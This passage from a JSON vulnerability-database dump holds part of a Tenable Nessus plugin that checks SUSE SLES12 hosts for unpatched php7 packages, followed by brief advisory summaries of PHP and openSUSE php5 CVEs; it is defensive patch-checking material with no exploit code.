value:\"p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php7-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php7-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bcmath-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bcmath-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bz2-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bz2-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-calendar-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-calendar-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ctype-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ctype-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-curl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-curl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dba-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dba-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-debugsource-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dom-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dom-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-enchant-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-enchant-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-exif-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-exif-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fastcgi-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fastcgi-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fileinfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fileinfo-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fpm-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fpm-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ftp-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ftp-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gd-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gd-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gettext-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gettext-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gmp-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gmp-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-iconv-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-iconv-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-imap-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-imap-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-intl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-intl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-json-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-json-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ldap-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ldap-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mbstring-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mbstring-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mcrypt-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mcrypt-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mysql-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mysql-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-odbc-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-odbc-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-opcache-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-opcache-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-openssl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-openssl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pcntl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pcntl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pdo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pdo-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pgsql-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pgsql-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-phar-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-phar-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-posix-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-posix-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pspell-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pspell-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-shmop-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-shmop-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-snmp-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-snmp-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-soap-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-soap-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sockets-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sockets-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sqlite-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sqlite-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvmsg-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvmsg-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvsem-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvsem-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvshm-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvshm-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-tokenizer-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-tokenizer-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-wddx-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-wddx-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlreader-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlreader-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlrpc-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlrpc-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlwriter-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlwriter-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xsl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xsl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zip-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zip-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zlib-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zlib-debuginfo-7.0.7-50.9.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php7\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:52", "description": "According to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.21. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library in the compile_bracket_matchingpath() function within file pcre_jit_compile.c. An unauthenticated, remote attacker can exploit this, via a specially crafted regular expression, to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition. (CVE-2017-11145)\n\n - A use-after-free error exists in PHP in the zval_get_type() function within file ext/standard/var_unserializer.c. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.y, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n\n - A stack-based buffer overflow condition exists in PHP in the msgfmt_parse_message() function due to improper validation of user-supplied input when parsing locale. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 7.0.x < 7.0.21 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-6004", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98844", "href": "https://www.tenable.com/plugins/was/98844", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:04", "description": "This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX deserialization of booleanparameters could be used by attackers able to inject XML for deserialization tocrash the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the return value of the OpenSSL sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code could lead to information leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by attackers supplying malicious archive files to crash the PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data in gdImageCreateFromGifCtx function could lead to denial of service (bsc#1050241)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {}, "published": "2017-09-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php5 (openSUSE-2017-1010)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 